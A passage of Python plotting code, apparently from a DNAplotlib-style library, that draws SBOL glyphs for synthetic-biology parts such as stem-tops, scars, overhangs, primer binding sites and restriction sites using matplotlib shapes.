dash2 = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[-y_extent/2,-y_extent+(x_extent/2.0)],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
solidO = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[0,-y_extent+(x_extent/2.0)],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
solidX = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[0,-y_extent],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
if(headgroup == "O" and linetype == "dash"):
ax.add_patch(c1)
ax.add_line(dash1)
ax.add_line(dash2)
elif(headgroup == "X" and linetype == "dash"):
ax.add_line(x1)
ax.add_line(x2)
ax.add_line(dash1)
ax.add_line(dash2)
elif(headgroup == "O" and linetype == "solid"):
ax.add_patch(c1)
ax.add_line(solidO)
elif(headgroup == "X" and linetype == "solid"):
ax.add_line(x1)
ax.add_line(x2)
ax.add_line(solidX)
else:
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
rbs_center = (start+((end-start)/2.0),y_extent)
c1 = Circle(rbs_center, x_extent/2.0, linewidth=linewidth, edgecolor=color,
facecolor=(1,1,1), zorder=8+zorder_add)
x1 = Line2D([start,end],[y_extent*1.25,y_extent/1.5],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle='-')
x2 = Line2D([start,end],[y_extent/1.5,y_extent*1.25],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle='-')
dash1 = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[0,y_extent/4],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
dash2 = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[y_extent/2,y_extent-(x_extent/2.0)],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
solidO = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[0,y_extent-(x_extent/2.0)],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
solidX = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[0,y_extent],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
if(headgroup == 'O' and linetype == 'dash'):
ax.add_patch(c1)
ax.add_line(dash1)
ax.add_line(dash2)
elif(headgroup == "X" and linetype == "dash"):
ax.add_line(x1)
ax.add_line(x2)
ax.add_line(dash1)
ax.add_line(dash2)
elif(headgroup == "O" and linetype == "solid"):
ax.add_patch(c1)
ax.add_line(solidO)
elif(headgroup == "X" and linetype == "solid"):
ax.add_line(x1)
ax.add_line(x2)
ax.add_line(solidX)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
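# Summary of the type-to-glyph mapping encoded in the if/elif chain above:
#
#   Ribozyme         -> dashed stem, circle ('O') head
#   Protease         -> dashed stem, cross  ('X') head
#   ProteinStability -> solid  stem, circle ('O') head
#   Ribonuclease     -> solid  stem, cross  ('X') head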
def sbol_stem_top (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" General function for drawing stem-top parts (e.g., ribozyme and protease sites).
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 5.0
y_extent = 10.0
linestyle = '-'
shapetype = "";
if type in ["DNACleavageSite"]:
stemtype = 'straight'
toptype = 'X'
elif type in ["RNACleavageSite", "Ribonuclease"]:
stemtype = 'wavy'
toptype = 'X'
elif type in ["ProteinCleavageSite", "Protease"]:
stemtype = 'loopy'
toptype = 'X'
elif type in ["DNALocation"]:
stemtype = 'straight'
toptype = 'O'
elif type in ["RNALocation"]:
stemtype = 'wavy'
toptype = 'O'
elif type in ["ProteinLocation"]:
stemtype = 'loopy'
toptype = 'O'
elif type in ["DNAStability"]:
stemtype = 'straight'
toptype = 'P'
elif type in ["RNAStability"]:
stemtype = 'wavy'
toptype = 'P'
elif type in ["ProteinStability"]:
stemtype = 'loopy'
toptype = 'P'
elif type in ["StemTop"]:
stemtype = opts['stem']
toptype = opts['top']
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction and add start padding
final_end = end
final_start = prev_end
if start > end:
start = prev_end+end_pad+x_extent
end = prev_end+end_pad
final_end = start+start_pad
# Patches and lines for top glyph
# toptype=="X"
x1 = Line2D([start,end],[-y_extent*1.25,-y_extent/1.25],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle='-')
x2 = Line2D([start,end],[-y_extent/1.25,-y_extent*1.25],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle='-')
# toptype=="O"
center = (end+((start-end)/2.0),-y_extent)
c1 = Circle(center, x_extent/2.0, linewidth=linewidth, edgecolor=color,
facecolor=(1,1,1), zorder=12+zorder_add)
# toptype=='P'
pentagon_xy = [[end, -y_extent*1.25],
[end, -y_extent*0.87],
[(start + end)/2, -y_extent*0.68],
[start, -y_extent*0.87],
[start, -y_extent*1.25],
]
p1 = Polygon(pentagon_xy, closed=True, linewidth=linewidth, edgecolor=color,
facecolor=(1,1,1), zorder=12+zorder_add)
# Lines for stem glyph
# stemtype=='straight'
straight_stem = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[0, -y_extent],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
# stemtype=='wavy'
wave_height = y_extent/6
wave_start = (start + end)/2
wave_bezier_amp = x_extent*0.2
wave_bezier_dx = wave_bezier_amp*math.cos(math.pi/4)
wave_bezier_dy = wave_bezier_amp*math.sin(math.pi/4)
wavy_stem_path = Path(vertices=[[wave_start, 0],
[wave_start - wave_bezier_dx, -wave_bezier_dy],
[wave_start - wave_bezier_dx, -(wave_height - wave_bezier_dy)],
[wave_start, -wave_height],
[wave_start + wave_bezier_dx, -(wave_height + wave_bezier_dy)],
[wave_start + wave_bezier_dx, -(2*wave_height - wave_bezier_dy)],
[wave_start, -2*wave_height],
[wave_start - wave_bezier_dx, -(2*wave_height + wave_bezier_dy)],
[wave_start - wave_bezier_dx, -(3*wave_height - wave_bezier_dy)],
[wave_start, -3*wave_height],
[wave_start + wave_bezier_dx, -(3*wave_height + wave_bezier_dy)],
[wave_start + wave_bezier_dx, -(4*wave_height - wave_bezier_dy)],
[wave_start, -4*wave_height],
[wave_start - wave_bezier_dx, -(4*wave_height + wave_bezier_dy)],
[wave_start - wave_bezier_dx, -(5*wave_height - wave_bezier_dy)],
[wave_start, -5*wave_height],
[wave_start + wave_bezier_dx, -(5*wave_height + wave_bezier_dy)],
[wave_start + wave_bezier_dx, -(6*wave_height - wave_bezier_dy)],
[wave_start, -6*wave_height]],
codes=[1, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4])
wavy_stem = PathPatch(wavy_stem_path, linewidth=linewidth, edgecolor=color,
facecolor='none', zorder=8+zorder_add, linestyle=linestyle)
# stemtype=='loopy'
loop_offset_y = y_extent*0.015
loop_height = (y_extent - 2*loop_offset_y)/4
loop_start = (start + end)/2 + x_extent*0.05
loop_end = end + x_extent*0.15
loop_bezier_amp = y_extent*0.03
loop_stem_path = Path(vertices=[[loop_start, -loop_offset_y],
[loop_start, -(loop_offset_y - loop_bezier_amp)],
[loop_end, -(loop_offset_y - loop_bezier_amp)],
[loop_end, -(loop_offset_y + loop_height*0.5)],
[loop_end, -(loop_offset_y + loop_height + loop_bezier_amp)],
[loop_start, -(loop_offset_y + loop_height + loop_bezier_amp)],
[loop_start, -(loop_offset_y + loop_height)],
[loop_start, -(loop_offset_y + loop_height - loop_bezier_amp)],
[loop_end, -(loop_offset_y + loop_height - loop_bezier_amp)],
[loop_end, -(loop_offset_y + loop_height*1.5)],
[loop_end, -(loop_offset_y + loop_height*2 + loop_bezier_amp)],
[loop_start, -(loop_offset_y + loop_height*2 + loop_bezier_amp)],
[loop_start, -(loop_offset_y + loop_height*2)],
[loop_start, -(loop_offset_y + loop_height*2 - loop_bezier_amp)],
[loop_end, -(loop_offset_y + loop_height*2 - loop_bezier_amp)],
[loop_end, -(loop_offset_y + loop_height*2.5)],
[loop_end, -(loop_offset_y + loop_height*3 + loop_bezier_amp)],
[loop_start, -(loop_offset_y + loop_height*3 + loop_bezier_amp)],
[loop_start, -(loop_offset_y + loop_height*3)],
[loop_start, -(loop_offset_y + loop_height*3 - loop_bezier_amp)],
[loop_end, -(loop_offset_y + loop_height*3 - loop_bezier_amp)],
[loop_end, -(loop_offset_y + loop_height*3.5)],
[loop_end, -(loop_offset_y + loop_height*4 + loop_bezier_amp)],
[loop_start, -(loop_offset_y + loop_height*4 + loop_bezier_amp)],
[loop_start, -(loop_offset_y + loop_height*4)],
],
codes=[1, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4])
loop_stem = PathPatch(loop_stem_path, linewidth=linewidth, edgecolor=color,
facecolor='none', zorder=8+zorder_add, linestyle=linestyle)
else:
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
# Patches and lines for top glyph
# toptype=="X"
x1 = Line2D([start,end],[y_extent*1.25,y_extent/1.25],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle='-')
x2 = Line2D([start,end],[y_extent/1.25,y_extent*1.25],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle='-')
# toptype=="O"
center = (start+((end-start)/2.0),y_extent)
c1 = Circle(center, x_extent/2.0, linewidth=linewidth, edgecolor=color,
facecolor=(1,1,1), zorder=12+zorder_add)
# toptype=='P'
pentagon_xy = [[start, y_extent*1.25],
[start, y_extent*0.87],
[(start + end)/2, y_extent*0.68],
[end, y_extent*0.87],
[end, y_extent*1.25],
]
p1 = Polygon(pentagon_xy, closed=True, linewidth=linewidth, edgecolor=color,
facecolor=(1,1,1), zorder=12+zorder_add)
# Lines for stem glyph
# stemtype=='straight'
straight_stem = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[0,y_extent],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
# stemtype=='wavy'
wave_height = y_extent/6
wave_start = (start + end)/2
wave_bezier_amp = x_extent*0.2
wave_bezier_dx = wave_bezier_amp*math.cos(math.pi/4)
wave_bezier_dy = wave_bezier_amp*math.sin(math.pi/4)
wavy_stem_path = Path(vertices=[[wave_start, 0],
[wave_start + wave_bezier_dx, wave_bezier_dy],
[wave_start + wave_bezier_dx, wave_height - wave_bezier_dy],
[wave_start, wave_height],
[wave_start - wave_bezier_dx, wave_height + wave_bezier_dy],
[wave_start - wave_bezier_dx, 2*wave_height - wave_bezier_dy],
[wave_start, 2*wave_height],
[wave_start + wave_bezier_dx, 2*wave_height + wave_bezier_dy],
[wave_start + wave_bezier_dx, 3*wave_height - wave_bezier_dy],
[wave_start, 3*wave_height],
[wave_start - wave_bezier_dx, 3*wave_height + wave_bezier_dy],
[wave_start - wave_bezier_dx, 4*wave_height - wave_bezier_dy],
[wave_start, 4*wave_height],
[wave_start + wave_bezier_dx, 4*wave_height + wave_bezier_dy],
[wave_start + wave_bezier_dx, 5*wave_height - wave_bezier_dy],
[wave_start, 5*wave_height],
[wave_start - wave_bezier_dx, 5*wave_height + wave_bezier_dy],
[wave_start - wave_bezier_dx, 6*wave_height - wave_bezier_dy],
[wave_start, 6*wave_height]],
codes=[1, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4])
wavy_stem = PathPatch(wavy_stem_path, linewidth=linewidth, edgecolor=color,
facecolor='none', zorder=8+zorder_add, linestyle=linestyle)
# stemtype=='loopy'
loop_offset_y = y_extent*0.015
loop_height = (y_extent - 2*loop_offset_y)/4
loop_start = (start + end)/2 - x_extent*0.05
loop_end = end - x_extent*0.15
loop_bezier_amp = y_extent*0.03
loop_stem_path = Path(vertices=[[loop_start, loop_offset_y],
[loop_start, loop_offset_y - loop_bezier_amp],
[loop_end, loop_offset_y - loop_bezier_amp],
[loop_end, loop_offset_y + loop_height*0.5],
[loop_end, loop_offset_y + loop_height + loop_bezier_amp],
[loop_start, loop_offset_y + loop_height + loop_bezier_amp],
[loop_start, loop_offset_y + loop_height],
[loop_start, loop_offset_y + loop_height - loop_bezier_amp],
[loop_end, loop_offset_y + loop_height - loop_bezier_amp],
[loop_end, loop_offset_y + loop_height*1.5],
[loop_end, loop_offset_y + loop_height*2 + loop_bezier_amp],
[loop_start, loop_offset_y + loop_height*2 + loop_bezier_amp],
[loop_start, loop_offset_y + loop_height*2],
[loop_start, loop_offset_y + loop_height*2 - loop_bezier_amp],
[loop_end, loop_offset_y + loop_height*2 - loop_bezier_amp],
[loop_end, loop_offset_y + loop_height*2.5],
[loop_end, loop_offset_y + loop_height*3 + loop_bezier_amp],
[loop_start, loop_offset_y + loop_height*3 + loop_bezier_amp],
[loop_start, loop_offset_y + loop_height*3],
[loop_start, loop_offset_y + loop_height*3 - loop_bezier_amp],
[loop_end, loop_offset_y + loop_height*3 - loop_bezier_amp],
[loop_end, loop_offset_y + loop_height*3.5],
[loop_end, loop_offset_y + loop_height*4 + loop_bezier_amp],
[loop_start, loop_offset_y + loop_height*4 + loop_bezier_amp],
[loop_start, loop_offset_y + loop_height*4],
],
codes=[1, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4, 4,4,4])
loop_stem = PathPatch(loop_stem_path, linewidth=linewidth, edgecolor=color,
facecolor='none', zorder=8+zorder_add, linestyle=linestyle)
# Add stem patches and/or lines
if stemtype == 'straight':
ax.add_line(straight_stem)
elif stemtype == 'wavy':
ax.add_patch(wavy_stem)  # PathPatch objects must be added as patches, not lines
elif stemtype == 'loopy':
ax.add_patch(loop_stem)
# Add top patches and/or lines
if toptype == 'O':
ax.add_patch(c1)
elif toptype == 'X':
ax.add_line(x1)
ax.add_line(x2)
elif toptype == 'P':
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_scar (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL scar renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 6.0
y_extent = 1.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Add start padding (orientation is ignored for this part)
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
l_top = Line2D([start,start+x_extent],[y_extent,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l_bottom = Line2D([start,start+x_extent],[-1*y_extent,-1*y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
#white rectangle overlays backbone line
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(start+x_extent, -y_extent),
(start+x_extent, y_extent)],
edgecolor=(1,1,1), facecolor=(1,1,1), linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # Workaround for matplotlib < 1.4.0
ax.add_patch(p1)
ax.add_line(l_top)
ax.add_line(l_bottom)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_empty_space (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in empty space renderer.
"""
# Default options
zorder_add = 0.0
x_extent = 12.0
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
# Empty space just advances the current position by x_extent
final_start = prev_end
final_end = final_start+x_extent
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_5_overhang (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL 5' overhang renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 0.0
end_pad = 2.0
x_extent = 6.0
y_extent = 1.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Add start padding (orientation is ignored for this part)
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
l_top = Line2D([start,start+x_extent],[y_extent,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l_bottom = Line2D([start+(x_extent/2.0),start+x_extent],[-1*y_extent,-1*y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
#white rectangle overlays backbone line
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(start+x_extent, -y_extent),
(start+x_extent, y_extent)],
edgecolor=(1,1,1), facecolor=(1,1,1), linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # Workaround for matplotlib < 1.4.0
ax.add_patch(p1)
ax.add_line(l_top)
ax.add_line(l_bottom)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_3_overhang (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL 3' overhang renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 0.0
x_extent = 6.0
y_extent = 1.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Add start padding (orientation is ignored for this part)
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
l_top = Line2D([start,start+x_extent],[y_extent,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l_bottom = Line2D([start,start+(x_extent/2.0)],[-1*y_extent,-1*y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
#white rectangle overlays backbone line
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(start+x_extent, -y_extent),
(start+x_extent, y_extent)],
edgecolor=(1,1,1), facecolor=(1,1,1), linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # Workaround for matplotlib < 1.4.0
ax.add_patch(p1)
ax.add_line(l_top)
ax.add_line(l_bottom)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_blunt_restriction_site (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL blunt-end restriction site renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
y_extent = 4.0
x_extent = 1.5
site_space = 1.5
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'site_space' in list(opts.keys()):
site_space = opts['site_space']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Direction is meaningless for this part => start is always < end
if start > end:
temp_end = end
end = start
start = temp_end
# Add start padding
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent+site_space+x_extent
final_end = end+end_pad
l1 = Line2D([start+x_extent,start+x_extent],[-y_extent,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l1_top = Line2D([start,start+x_extent],[y_extent,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l1_bottom = Line2D([start,start+x_extent],[-y_extent,-y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l2 = Line2D([end-x_extent,end-x_extent],[-y_extent,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l2_top = Line2D([end,end-x_extent],[y_extent,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l2_bottom = Line2D([end,end-x_extent],[-y_extent,-y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
ax.add_line(l1)
ax.add_line(l1_top)
ax.add_line(l1_bottom)
ax.add_line(l2)
ax.add_line(l2_top)
ax.add_line(l2_bottom)
if opts != None and 'label' in list(opts.keys()):
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
return final_start, final_end
def sbol_primer_binding_site (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL primer binding site renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
y_extent = 2.0
y_offset = 1.5
x_extent = 8.0
arrowhead_length = 2.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'y_offset' in list(opts.keys()):
y_offset = opts['y_offset']
if 'arrowhead_length' in list(opts.keys()):
arrowhead_length = opts['arrowhead_length']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
direction = 'F'
if start > end:
direction = 'R'
temp_end = end
end = start
start = temp_end
final_end = prev_end
final_start = prev_end
if direction == 'F':
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
else:
final_start = prev_end
end = prev_end+end_pad
start = end+x_extent
final_start = start+start_pad
if direction == 'F':
verts = [(start, y_offset), (end, y_offset), (end-arrowhead_length, y_offset+y_extent)]
codes = [Path.MOVETO, Path.LINETO, Path.LINETO]
path = Path(verts, codes)
patch = PathPatch(path, lw=linewidth, edgecolor=color, facecolor=(1,1,1), zorder=1+zorder_add)
ax.add_patch(patch)
else:
verts = [(start, -y_offset), (end, -y_offset), (end+arrowhead_length, -y_offset-y_extent)]
codes = [Path.MOVETO, Path.LINETO, Path.LINETO]
path = Path(verts, codes)
patch = PathPatch(path, lw=linewidth, edgecolor=color, facecolor=(1,1,1), zorder=1+zorder_add)
ax.add_patch(patch)
if opts != None and 'label' in list(opts.keys()):
if start > end:
write_label(ax, opts['label'], end+((start-end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], start+((end-start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_5_sticky_restriction_site (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL 5' sticky-end restriction site renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
y_extent = 4.0
x_extent = 8.0
end_space = 1.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'end_space' in list(opts.keys()):
end_space = opts['end_space']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Direction is meaningless for this part => start is always < end
if start > end:
temp_end = end
end = start
start = temp_end
# Add start padding
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+end_space+x_extent+end_space
final_end = end+end_pad
l1 = Line2D([start+end_space,start+end_space+x_extent],[0,0],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l1_top = Line2D([start+end_space,start+end_space],[0,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l1_bottom = Line2D([start+end_space+x_extent,start+end_space+x_extent],[0,-y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
ax.add_line(l1)
ax.add_line(l1_top)
ax.add_line(l1_bottom)
# White rectangle overlays backbone line
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(end, -y_extent),
(end, y_extent)],
edgecolor=(1,1,1), facecolor=(1,1,1), linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # Workaround for matplotlib < 1.4.0
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
return final_start, final_end
def sbol_3_sticky_restriction_site (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL 3' sticky-end restriction site renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
y_extent = 4.0
x_extent = 8.0
end_space = 1.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'end_space' in list(opts.keys()):
end_space = opts['end_space']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Direction is meaningless for this part => start is always < end
if start > end:
temp_end = end
end = start
start = temp_end
# Add start padding
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+end_space+x_extent+end_space
final_end = end+end_pad
l1 = Line2D([start+end_space,start+end_space+x_extent],[0,0],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l1_top = Line2D([start+end_space+x_extent,start+end_space+x_extent],[0,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
l1_bottom = Line2D([start+end_space,start+end_space],[0,-y_extent],
